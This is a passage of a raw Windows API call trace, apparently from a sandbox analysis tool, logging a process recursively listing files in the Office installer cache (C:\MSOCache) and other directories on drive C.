ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xee803530, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee803530, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-00BA-0409-1000-0000000FF1CE}-C", cAlternateFileName="{90140~4")) returned 1 [0070.326] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.326] lstrlenW (lpString="{90140000-00BA-0409-1000-0000000FF1CE}-C") returned 40 [0070.326] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee38cbf0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xee803530, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee803530, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName=".", cAlternateFileName="")) returned 0x4da340 [0070.327] FindNextFileW (in: hFindFile=0x4da340, lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee38cbf0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xee803530, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee803530, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName="..", cAlternateFileName="")) returned 1 [0070.327] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.327] FindNextFileW (in: hFindFile=0x4da340, lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd907a00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbd907a00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee4bb7b0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x3e7e1f, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName="GrooveLR.cab", cAlternateFileName="")) returned 1 [0070.327] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.327] lstrlenW (lpString="GrooveLR.cab") returned 12 [0070.327] FindClose (in: hFindFile=0x4da340 | out: hFindFile=0x4da340) returned 1 [0070.328] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d91a8 | out: hHeap=0x4a0000) returned 1 [0070.328] FindNextFileW (in: hFindFile=0x4d7f50, lpFindFileData=0x4d7cf8 | out: lpFindFileData=0x4d7cf8*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b68970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe8729610, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8729610, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-0115-0409-1000-0000000FF1CE}-C", cAlternateFileName="{90140~1")) returned 1 [0070.328] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.328] lstrlenW (lpString="{90140000-0115-0409-1000-0000000FF1CE}-C") returned 40 [0070.328] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b68970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe8729610, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8729610, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName=".", cAlternateFileName="")) returned 0x4da340 [0070.330] FindNextFileW (in: hFindFile=0x4da340, lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b68970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe8729610, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8729610, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName="..", cAlternateFileName="")) returned 1 [0070.330] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.330] FindNextFileW (in: hFindFile=0x4da340, lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8691090, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe8691090, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8691090, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName="1033", cAlternateFileName="")) returned 1 [0070.330] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.330] lstrlenW (lpString="1033") returned 4 [0070.330] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\*", lpFindFileData=0x4de2f8 | out: lpFindFileData=0x4de2f8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8691090, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe8691090, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8691090, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d301be, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4dd690 [0070.331] FindNextFileW (in: hFindFile=0x4dd690, lpFindFileData=0x4de2f8 | out: lpFindFileData=0x4de2f8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8691090, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe8691090, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8691090, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d301be, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0070.331] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.331] FindNextFileW (in: hFindFile=0x4dd690, lpFindFileData=0x4de2f8 | out: lpFindFileData=0x4de2f8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6a35700, ftCreationTime.dwHighDateTime=0x1cac9d7, ftLastAccessTime.dwLowDateTime=0x6a35700, ftLastAccessTime.dwHighDateTime=0x1cac9d7, ftLastWriteTime.dwLowDateTime=0xe8691090, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x1a588, dwReserved0=0x1d301be, dwReserved1=0x0, cFileName="dwintl20.dll", cAlternateFileName="")) returned 1 [0070.331] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.331] lstrlenW (lpString="dwintl20.dll") returned 12 [0070.331] FindClose (in: hFindFile=0x4dd690 | out: hFindFile=0x4dd690) returned 1 [0070.331] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4de2f8 | out: hHeap=0x4a0000) returned 1 [0070.331] FindNextFileW (in: hFindFile=0x4da340, lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x11e8ef00, ftCreationTime.dwHighDateTime=0x1cacdea, ftLastAccessTime.dwLowDateTime=0x11e8ef00, ftLastAccessTime.dwHighDateTime=0x1cacdea, ftLastWriteTime.dwLowDateTime=0xe84c60d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x91975, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName="branding.xml", cAlternateFileName="")) returned 1 [0070.331] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.331] lstrlenW (lpString="branding.xml") returned 12 [0070.331] FindClose (in: hFindFile=0x4da340 | out: hFindFile=0x4da340) returned 1 [0070.331] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d91a8 | out: hHeap=0x4a0000) returned 1 [0070.331] FindNextFileW (in: hFindFile=0x4d7f50, lpFindFileData=0x4d7cf8 | out: lpFindFileData=0x4d7cf8*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfa13c510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc112b50, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc112b50, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-0117-0409-1000-0000000FF1CE}-C", cAlternateFileName="{9AFC7~1")) returned 1 [0070.332] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.332] lstrlenW (lpString="{90140000-0117-0409-1000-0000000FF1CE}-C") returned 40 [0070.332] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfa13c510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc112b50, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc112b50, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName=".", cAlternateFileName="")) returned 0x4dd690 [0070.368] FindNextFileW (in: hFindFile=0x4dd690, lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfa13c510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc112b50, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc112b50, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName="..", cAlternateFileName="")) returned 1 [0070.368] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.368] FindNextFileW (in: hFindFile=0x4dd690, lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfa2b92d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc0c6890, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc0c6890, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName="Access.en-us", cAlternateFileName="ACCESS~1.EN-")) returned 1 [0070.368] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.368] lstrlenW (lpString="Access.en-us") returned 12 [0070.368] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\*", lpFindFileData=0x4dda00 | out: lpFindFileData=0x4dda00*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfa2b92d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc0c6890, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc0c6890, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x995ea08c, dwReserved1=0x80b18315, cFileName=".", cAlternateFileName="")) returned 0x4c4628 [0070.391] FindNextFileW (in: hFindFile=0x4c4628, lpFindFileData=0x4dda00 | out: lpFindFileData=0x4dda00*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfa2b92d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc0c6890, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc0c6890, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x995ea08c, dwReserved1=0x80b18315, cFileName="..", cAlternateFileName="")) returned 1 [0070.391] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.391] FindNextFileW (in: hFindFile=0x4c4628, lpFindFileData=0x4dda00 | out: lpFindFileData=0x4dda00*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfa623330, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x266a00, dwReserved0=0x995ea08c, dwReserved1=0x80b18315, cFileName="AccessMUI.msi", cAlternateFileName="ACCESS~1.MSI")) returned 1 [0070.391] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.391] lstrlenW (lpString="AccessMUI.msi") returned 13 [0070.392] FindClose (in: hFindFile=0x4c4628 | out: hFindFile=0x4c4628) returned 1 [0070.392] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dda00 | out: hHeap=0x4a0000) returned 1 [0070.392] FindNextFileW (in: hFindFile=0x4dd690, lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3f33d800, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3f33d800, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfa160f00, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd4200, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName="AccessMUISet.msi", cAlternateFileName="ACCESS~1.MSI")) returned 1 [0070.392] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.392] lstrlenW (lpString="AccessMUISet.msi") returned 16 [0070.393] FindClose (in: hFindFile=0x4dd690 | out: hFindFile=0x4dd690) returned 1 [0070.393] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d91a8 | out: hHeap=0x4a0000) returned 1 [0070.393] FindNextFileW (in: hFindFile=0x4d7f50, lpFindFileData=0x4d7cf8 | out: lpFindFileData=0x4d7cf8*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfe09ced0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x18179b90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x18179b90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{91140000-0011-0000-1000-0000000FF1CE}-C", cAlternateFileName="{91140~1")) returned 1 [0070.393] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.393] lstrlenW (lpString="{91140000-0011-0000-1000-0000000FF1CE}-C") returned 40 [0070.393] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\*", lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfe09ced0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x18179b90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x18179b90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName=".", cAlternateFileName="")) returned 0x4c4628 [0070.446] FindNextFileW (in: hFindFile=0x4c4628, lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfe09ced0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x18179b90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x18179b90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName="..", cAlternateFileName="")) returned 1 [0070.446] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.446] FindNextFileW (in: hFindFile=0x4c4628, lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x34ae1a00, ftCreationTime.dwHighDateTime=0x1cad01b, ftLastAccessTime.dwLowDateTime=0x34ae1a00, ftLastAccessTime.dwHighDateTime=0x1cad01b, ftLastWriteTime.dwLowDateTime=0xfe0c2860, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x1e6600, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName="Office32WW.msi", cAlternateFileName="OFFICE~1.MSI")) returned 1 [0070.446] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.446] lstrlenW (lpString="Office32WW.msi") returned 14 [0070.446] FindClose (in: hFindFile=0x4c4628 | out: hFindFile=0x4c4628) returned 1 [0070.447] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d91a8 | out: hHeap=0x4a0000) returned 1 [0070.447] FindNextFileW (in: hFindFile=0x4d7f50, lpFindFileData=0x4d7cf8 | out: lpFindFileData=0x4d7cf8*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xa5cd3a40, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xa8c22f80, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa8c22f80, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{91140000-003B-0000-1000-0000000FF1CE}-C", cAlternateFileName="{91140~3")) returned 1 [0070.447] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.447] lstrlenW (lpString="{91140000-003B-0000-1000-0000000FF1CE}-C") returned 40 [0070.447] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\*", lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xa5cd3a40, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xa8c22f80, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa8c22f80, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName=".", cAlternateFileName="")) returned 0x4c4628 [0070.539] FindNextFileW (in: hFindFile=0x4c4628, lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xa5cd3a40, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xa8c22f80, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa8c22f80, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName="..", cAlternateFileName="")) returned 1 [0070.539] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.539] FindNextFileW (in: hFindFile=0x4c4628, lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x87078450, ftCreationTime.dwHighDateTime=0x1cb147f, ftLastAccessTime.dwLowDateTime=0x87078450, ftLastAccessTime.dwHighDateTime=0x1cb147f, ftLastWriteTime.dwLowDateTime=0xa5d1e590, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x1e6600, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName="Office32WW.msi", cAlternateFileName="OFFICE~1.MSI")) returned 1 [0070.539] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.539] lstrlenW (lpString="Office32WW.msi") returned 14 [0070.540] FindClose (in: hFindFile=0x4c4628 | out: hFindFile=0x4c4628) returned 1 [0070.540] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d91a8 | out: hHeap=0x4a0000) returned 1 [0070.540] FindNextFileW (in: hFindFile=0x4d7f50, lpFindFileData=0x4d7cf8 | out: lpFindFileData=0x4d7cf8*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x46538340, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x4a6d41a0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x4a6d41a0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{91140000-0057-0000-1000-0000000FF1CE}-C", cAlternateFileName="{91140~2")) returned 1 [0070.540] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.540] lstrlenW (lpString="{91140000-0057-0000-1000-0000000FF1CE}-C") returned 40 [0070.541] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\*", lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x46538340, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x4a6d41a0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x4a6d41a0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName=".", cAlternateFileName="")) returned 0x4c4628 [0070.629] FindNextFileW (in: hFindFile=0x4c4628, lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x46538340, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x4a6d41a0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x4a6d41a0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName="..", cAlternateFileName="")) returned 1 [0070.629] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.629] FindNextFileW (in: hFindFile=0x4c4628, lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe5ed9630, ftCreationTime.dwHighDateTime=0x1cb12b3, ftLastAccessTime.dwLowDateTime=0xe5ed9630, ftLastAccessTime.dwHighDateTime=0x1cb12b3, ftLastWriteTime.dwLowDateTime=0x4655d500, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x1e6600, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName="Office32WW.msi", cAlternateFileName="OFFICE~1.MSI")) returned 1 [0070.629] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.629] lstrlenW (lpString="Office32WW.msi") returned 14 [0070.630] FindClose (in: hFindFile=0x4c4628 | out: hFindFile=0x4c4628) returned 1 [0070.630] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d91a8 | out: hHeap=0x4a0000) returned 1 [0070.630] FindNextFileW (in: hFindFile=0x4d7f50, lpFindFileData=0x4d7cf8 | out: lpFindFileData=0x4d7cf8*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x46538340, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x4a6d41a0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x4a6d41a0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{91140000-0057-0000-1000-0000000FF1CE}-C", cAlternateFileName="{91140~2")) returned 0 [0070.630] FindClose (in: hFindFile=0x4d7f50 | out: hFindFile=0x4d7f50) returned 1 [0070.630] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d7cf8 | out: hHeap=0x4a0000) returned 1 [0070.630] FindNextFileW (in: hFindFile=0x4c45e8, lpFindFileData=0x4d6a98 | out: lpFindFileData=0x4d6a98*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xa5cd3a40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5cd3a40, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 0 [0070.631] FindClose (in: hFindFile=0x4c45e8 | out: hFindFile=0x4c45e8) returned 1 [0070.631] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d6a98 | out: hHeap=0x4a0000) returned 1 [0070.631] FindNextFileW (in: hFindFile=0x4c3f90, lpFindFileData=0x4d5838 | out: lpFindFileData=0x4d5838*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x563d4b80, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x563d4b80, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0xaece4da0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x7ff7c000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pagefile.sys", cAlternateFileName="")) returned 1 [0070.631] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.631] lstrlenW (lpString="pagefile.sys") returned 12 [0070.631] FindFirstFileW (in: lpFileName="\\\\?\\C:\\PerfLogs\\*", lpFindFileData=0x4e1440 | out: lpFindFileData=0x4e1440*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd72e458, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4dd790 [0070.631] FindNextFileW (in: hFindFile=0x4dd790, lpFindFileData=0x4e1440 | out: lpFindFileData=0x4e1440*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, 